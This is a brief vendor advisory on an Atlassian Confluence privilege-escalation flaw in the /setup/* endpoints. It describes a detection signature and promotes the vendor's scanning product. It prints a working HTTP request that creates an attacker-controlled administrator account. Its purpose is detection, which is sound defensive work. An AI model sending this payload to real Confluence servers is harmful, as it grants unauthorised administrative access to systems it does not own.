Appliances Details
On-premise Atlassian Confluence Data Center and Server products.
Vulnerability
Atlassian Confluence Data Center and Server could allow a remote attacker to gain elevated privileges on the system, caused by an error related to the /setup/* endpoints on Confluence instances.
Identification
An attacker could exploit this vulnerability to create administrator accounts that can be used to access Confluence instances.
POST /setup/setupadministrator.action
PAYLOAD -
username=haxor&fullName=haxor&email=haxor%40localhost&password=Password2&confirm=Password2&setup-next-button=Next
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to create administrator accounts that can be used to access Confluence instances.
Coverage
Idappcom have created signature 8024298 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments